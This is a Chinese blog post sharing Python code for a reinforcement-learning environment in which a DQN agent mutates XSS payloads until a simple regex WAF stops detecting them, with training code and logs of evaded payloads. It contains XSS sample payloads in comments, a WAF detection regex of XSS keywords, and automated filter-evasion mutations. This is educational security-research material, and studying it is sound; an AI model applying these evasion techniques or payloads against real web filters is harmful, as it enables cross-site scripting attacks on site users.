WAF 强化学习

参考:https://github.com/duoergun0729/3book/tree/master/code/gym-waf

代码:

wafEnv.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
# -*- coding: utf-8 -*-
import numpy as np
import re
import random
from gym import spaces
import gym
from sklearn.model_selection import train_test_split
 
#samples_file="xss-samples.txt"
# Path of the XSS sample corpus; it is opened relative to the current
# working directory and every line is treated as one payload.
samples_file="xss-samples-all.txt"
samples=[]
with open(samples_file) as f:
    for line in f:
        # Strip newline characters only; any other whitespace stays part of
        # the payload.
        line = line.strip('\n')
        print("Add xss sample:" + line)
        samples.append(line)
 
# Split the samples into a training set and a test set (40% held out for testing).
samples_train, samples_test = train_test_split(samples, test_size=0.4)
 
 
class Xss_Manipulator(object):
    """Apply random WAF-evasion mutations to an XSS payload string.

    Every action picks, at random, one letter in the range a-q (either case)
    that occurs in the payload and rewrites occurrences of that exact
    character (the replacement itself is case-sensitive).  When the payload
    contains no such letter it is returned unchanged.

    Available mutations:

    * ``charTo16``     - hexadecimal character reference, e.g. ``a`` -> ``&#x61;``
    * ``charTo10``     - decimal character reference, e.g. ``a`` -> ``&#97;``
    * ``charTo10Zero`` - zero-padded decimal reference, e.g. ``a`` -> ``&#00000097;``
    * ``addComment``   - append a ``/*8888*/`` comment after the letter
    * ``addTab``       - insert whitespace before the letter
    * ``addZero``      - insert a NUL character before the letter
    * ``addEnter``     - insert CR LF before the letter

    Only the actions listed in ``ACTION_TABLE`` are exposed to the agent.
    The ``seed`` parameter of every action is accepted for interface
    compatibility but is not used; randomness comes from the global
    ``random`` module state.
    """

    # Actions exposed to the reinforcement-learning agent (name -> method
    # name).  The character-reference actions (charTo16, charTo10,
    # charTo10Zero) are implemented below but intentionally not enabled.
    ACTION_TABLE = {
        'addComment': 'addComment',
        'addTab': 'addTab',
        'addZero': 'addZero',
        'addEnter': 'addEnter',
    }

    def __init__(self):
        self.dim = 0
        self.name = ""

    def _pick_letter(self, payload):
        """Return a random a-q/A-Q letter found in *payload*, or None."""
        candidates = re.findall(r'[a-qA-Q]', payload, re.M | re.I)
        if not candidates:
            return None
        return random.choice(candidates)

    def charTo16(self, str, seed=None):
        """Replace 1-3 occurrences of a random letter with ``&#xHH;``."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        # A hexadecimal character reference is written "&#x61;"; the
        # "0x" prefix produced by hex() would make it invalid.
        modify_char_16 = "&#x{:x};".format(ord(modify_char))
        return re.sub(modify_char, modify_char_16, str,
                      count=random.randint(1, 3))

    def charTo10(self, str, seed=None):
        """Replace every occurrence of a random letter with ``&#DDD;``."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        modify_char_10 = "&#{};".format(ord(modify_char))
        return re.sub(modify_char, modify_char_10, str)

    def charTo10Zero(self, str, seed=None):
        """Replace every occurrence of a random letter with ``&#000000DDD;``."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        modify_char_10 = "&#000000{};".format(ord(modify_char))
        return re.sub(modify_char, modify_char_10, str)

    def addComment(self, str, seed=None):
        """Append ``/*8888*/`` after every occurrence of a random letter."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        modify_char_comment = "{}/*8888*/".format(modify_char)
        return re.sub(modify_char, modify_char_comment, str)

    def addTab(self, str, seed=None):
        """Insert whitespace before every occurrence of a random letter."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        modify_char_tab = "   {}".format(modify_char)
        return re.sub(modify_char, modify_char_tab, str)

    def addZero(self, str, seed=None):
        """Insert a NUL character before every occurrence of a random letter."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        # re.sub() interprets "\00" in the replacement template as an octal
        # escape, so the text actually inserted is a single NUL character.
        modify_char_zero = "\\00{}".format(modify_char)
        return re.sub(modify_char, modify_char_zero, str)

    def addEnter(self, str, seed=None):
        """Insert CR LF before every occurrence of a random letter."""
        modify_char = self._pick_letter(str)
        if modify_char is None:
            return str
        # re.sub() expands "\r\n" in the replacement template into real
        # carriage-return / line-feed characters.
        modify_char_enter = "\\r\\n{}".format(modify_char)
        return re.sub(modify_char, modify_char_enter, str)

    def modify(self, str, _action, seed=6):
        """Apply the mutation named *_action* to *str* and return the result.

        Args:
            str: payload to mutate.
            _action: name of one of this class's mutation methods.
            seed: forwarded to the mutation method, which ignores it.

        Raises:
            AttributeError: if *_action* does not name an attribute.
        """
        print("Do action :%s" % _action)
        # Dispatch on this instance instead of building a throwaway one.
        action_func = getattr(self, _action)

        return action_func(str, seed)
 
# Integer action index -> action name, in ACTION_TABLE key order.
ACTION_LOOKUP = dict(enumerate(Xss_Manipulator.ACTION_TABLE))
 
 
 
#<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
#a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
#"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
#<input onblur=write(XSS) autofocus><input autofocus>
#<math><a xlink:href="//jsfiddle.net/t846h/">click
#<h1><font color=blue>hellox worldss</h1>
#LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
 
 
class Waf_Check(object):
    """Toy regex-based WAF used as the adversary of the evasion agent.

    ``regXSS`` is a single alternation of keywords and fragments that are
    treated as XSS indicators; matching is case-insensitive.
    """

    def __init__(self):
        self.name = "Waf_Check"
        # The original pattern had a stray "]" after "expression" (so a bare
        # "expression" never matched) and an unescaped "." in
        # "String.fromCharCode" (which matched any character).
        self.regXSS = r'(prompt|alert|confirm|expression)' \
                      r'|(javascript|script|eval)' \
                      r'|(onload|onerror|onfocus|onclick|ontoggle|onmousemove|ondrag)' \
                      r'|(String\.fromCharCode)' \
                      r'|(;base64,)' \
                      r'|(onblur=write)' \
                      r'|(xlink:href)' \
                      r'|(color=)'

    def check_xss(self, str):
        """Return True when *str* matches the XSS pattern, ignoring case."""
        return re.search(self.regXSS, str, re.IGNORECASE) is not None
 
class Features(object):
    """Turn a payload string into a fixed-length numeric feature vector."""

    def __init__(self):
        self.dim = 0
        self.name = ""
        self.dtype = np.float32

    def byte_histogram(self, str):
        """Return ``[total_bytes, p(0), p(1), ..., p(255)]`` for *str*.

        Text is encoded as UTF-8 first so that every value fits in one of
        the 256 bins; indexing by code point (``ord``) would make the vector
        longer than 257 entries for any non-Latin-1 character.  Byte strings
        are used as they are.  For empty input the histogram is all zeros
        instead of NaN.

        Returns:
            1-D numpy array of length 257.
        """
        data = str if isinstance(str, bytes) else str.encode("utf-8")

        h = np.bincount(np.frombuffer(data, dtype=np.uint8), minlength=256)
        total = h.sum()
        if total:
            normalized = h.astype(self.dtype).flatten() / total
        else:
            # Nothing to normalize; avoid 0/0.
            normalized = np.zeros(256, dtype=self.dtype)

        return np.concatenate([
            [total],  # total size of the byte stream
            normalized,  # normalized histogram
        ])

    def extract(self, str):
        """Return the feature matrix for *str*, shape ``(1, 257)``."""
        featurevectors = [
            [self.byte_histogram(str)]
        ]
        return np.concatenate(featurevectors)
 
 
class WafEnv_v0(gym.Env):
    """Gym environment in which an agent mutates XSS payloads to evade the WAF.

    One episode starts from a random training sample.  Each step applies the
    mutation selected by the action index; the episode ends with reward 10 as
    soon as ``Waf_Check`` no longer flags the payload, otherwise the reward
    is 0.

    Note that ``observation_space`` holds the most recent feature array
    produced by ``Features.extract`` (not a ``gym.spaces`` object).
    """

    metadata = {
        'render.modes': ['human', 'rgb_array'],
    }

    def __init__(self):
        # Helpers: feature extraction, WAF oracle, payload mutation.
        self.features_extra = Features()
        self.waf_checker = Waf_Check()
        self.xss_manipulatorer = Xss_Manipulator()

        # One discrete action per enabled mutation.
        self.action_space = spaces.Discrete(len(ACTION_LOOKUP))

        # Payload currently being mutated; replaced by _reset() below.
        self.current_sample = ""

        self._reset()

    def _seed(self, num):
        """Accept a seed for API compatibility; it is ignored."""
        pass

    def _step(self, action):
        """Apply mutation *action* and return ``(observation, reward, done, info)``."""
        action_name = ACTION_LOOKUP[action]
        self.current_sample = self.xss_manipulatorer.modify(
            self.current_sample, action_name)

        # The episode is won once the WAF stops flagging the payload.
        bypassed = not self.waf_checker.check_xss(self.current_sample)
        if bypassed:
            print("Good!!!!!!!avoid waf:%s" % self.current_sample)

        self.observation_space = self.features_extra.extract(self.current_sample)

        reward = 10 if bypassed else 0
        return self.observation_space, reward, bypassed, {}

    def _reset(self):
        """Start a new episode from a random training sample and return its features."""
        self.current_sample = random.choice(samples_train)
        print("reset current_sample=" + self.current_sample)

        observation = self.features_extra.extract(self.current_sample)
        self.observation_space = observation
        return observation

    def render(self, mode='human', close=False):
        """Rendering is not implemented; returns None."""
        return

 主代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
# -*- coding: utf-8 -*-
import gym
import time
import random
import gym_waf.envs.wafEnv
import pickle
import numpy as np
 
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, ELU, Dropout, BatchNormalization
from keras.optimizers import Adam, SGD, RMSprop
 
 
from rl.agents.dqn import DQNAgent
from rl.agents.sarsa import SarsaAgent
from rl.policy import EpsGreedyQPolicy
from rl.memory import SequentialMemory
 
 
from gym_waf.envs.wafEnv  import samples_test,samples_train
# from gym_waf.envs.features import Features
from gym_waf.envs.waf import Waf_Check
from gym_waf.envs.xss_manipulator import Xss_Manipulator
 
from keras.callbacks import TensorBoard
 
# Environment id passed to gym.make().
ENV_NAME = 'Waf-v0'
# Maximum number of attempts (steps): per training episode, and per sample
# during the evaluation loop.
nb_max_episode_steps_train=50
nb_max_episode_steps_test=3
 
# Integer action index -> action name, in ACTION_TABLE key order.
ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}
 
class Features(object):
    """Turn a payload string into a fixed-length numeric feature vector."""

    def __init__(self):
        self.dim = 0
        self.name = ""
        self.dtype = np.float32

    def byte_histogram(self, str):
        """Return ``[total_bytes, p(0), p(1), ..., p(255)]`` for *str*.

        Text is encoded as UTF-8 first so that every value fits in one of
        the 256 bins; indexing by code point (``ord``) would make the vector
        longer than 257 entries for any non-Latin-1 character.  Byte strings
        are used as they are.  For empty input the histogram is all zeros
        instead of NaN.

        Returns:
            1-D numpy array of length 257.
        """
        data = str if isinstance(str, bytes) else str.encode("utf-8")

        h = np.bincount(np.frombuffer(data, dtype=np.uint8), minlength=256)
        total = h.sum()
        if total:
            normalized = h.astype(self.dtype).flatten() / total
        else:
            # Nothing to normalize; avoid 0/0.
            normalized = np.zeros(256, dtype=self.dtype)

        return np.concatenate([
            [total],  # total size of the byte stream
            normalized,  # normalized histogram
        ])

    def extract(self, str):
        """Return the feature matrix for *str*, shape ``(1, 257)``."""
        featurevectors = [
            [self.byte_histogram(str)]
        ]
        return np.concatenate(featurevectors)
 
 
def generate_dense_model(input_shape, layers, nb_actions):
    """Build the fully connected Q-network.

    Architecture: Flatten -> Dropout(0.1) -> for each entry of *layers*
    [Dense -> BatchNormalization -> ELU] -> Dense(nb_actions) -> linear.

    Args:
        input_shape: shape of one network input, passed to ``Flatten``.
        layers: iterable with the number of units of each hidden layer.
        nb_actions: number of output units (one per action).

    Returns:
        The (uncompiled) ``Sequential`` model.
    """
    model = Sequential()
    model.add(Flatten(input_shape=input_shape))
    model.add(Dropout(0.1))

    for units in layers:
        model.add(Dense(units))
        model.add(BatchNormalization())
        model.add(ELU(alpha=1.0))

    model.add(Dense(nb_actions))
    model.add(Activation('linear'))
    # summary() prints the table itself and returns None, so wrapping it in
    # print() only appended a stray "None" line.
    model.summary()

    return model
 
 
def train_dqn_model(layers, rounds=10000):
    """Train a DQN agent on the WAF environment and evaluate it on the test set.

    Args:
        layers: hidden layer sizes forwarded to ``generate_dense_model``.
        rounds: number of training steps passed to ``agent.fit``.

    Returns:
        Tuple ``(agent, model)``: the trained ``DQNAgent`` and the Keras model
        that was handed to it.
    """
    env = gym.make(ENV_NAME)
    env.seed(1)
    nb_actions = env.action_space.n
    window_length = 1

    print("nb_actions:")
    print(nb_actions)
    print("env.observation_space.shape:")
    print(env.observation_space.shape)

    model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions)

    policy = EpsGreedyQPolicy()

    memory = SequentialMemory(limit=256, ignore_episode_boundaries=False, window_length=window_length)

    agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16,
                     enable_double_dqn=True, enable_dueling_network=True, dueling_type='avg',
                     target_model_update=1e-2, policy=policy, batch_size=16)

    agent.compile(RMSprop(lr=1e-3), metrics=['mae'])

    # nb_max_episode_steps caps the number of steps of a single episode.
    agent.fit(env, nb_steps=rounds, nb_max_episode_steps=nb_max_episode_steps_train, visualize=False, verbose=2)

    features_extra = Features()
    waf_checker = Waf_Check()
    # Mutates the current sample according to the chosen action.
    xss_manipulatorer = Xss_Manipulator()

    success = 0
    total = 0

    shp = (1,) + tuple(model.input_shape[1:])

    for sample in samples_test:
        total += 1

        for _ in range(nb_max_episode_steps_test):
            if not waf_checker.check_xss(sample):
                break

            f = features_extra.extract(sample).reshape(shp)
            # NOTE(review): with enable_dueling_network=True keras-rl may wrap
            # `model` in a new network; confirm that predicting with `model`
            # (rather than agent.model) yields the trained Q-values.
            act_values = model.predict(f)
            action = np.argmax(act_values[0])
            sample = xss_manipulatorer.modify(sample, ACTION_LOOKUP[action])

        # Check after the loop as well, so the payload produced by the last
        # allowed mutation is evaluated instead of being silently dropped.
        if not waf_checker.check_xss(sample):
            success += 1
            print(sample)

    print("Sum:{} Success:{}".format(total, success))

    return agent, model
 
 
if __name__ == '__main__':
    # Train with hidden layers [5, 2] for 1000 steps, then save the Keras
    # model to waf-v0.h5 (overwriting any existing file).
    agent1, model1= train_dqn_model([5, 2], rounds=1000)
    model1.save('waf-v0.h5', overwrite=True)

 效果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
reset current_sample=<img src=`xx:xx`onerror=alert(1)>
Do action :addEnter
Do action :addComment
Good!!!!!!!avoid waf:<img src=`xx:xx`
one/*8888*/rr
or=ale/*8888*/rt(1)>
 987/1000: episode: 221, duration: 0.016s, episode steps: 2, steps per second: 122, episode reward: 10.000, mean reward: 5.000 [0.000, 10.000], mean action: 1.500 [0.000, 3.000], mean observation: 0.179 [0.000, 53.000], loss: 1.608465, mean_absolute_error: 3.369818, mean_q: 7.756353
reset current_sample=<!--<img src="--><img src=x onerror=alert(123)//">
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addZero
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addEnter
Good!!!!!!!avoid waf:<!--<

 

posted @   bonelee  阅读(954)  评论(0编辑  收藏  举报
编辑推荐:
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
点击右上角即可分享
微信分享提示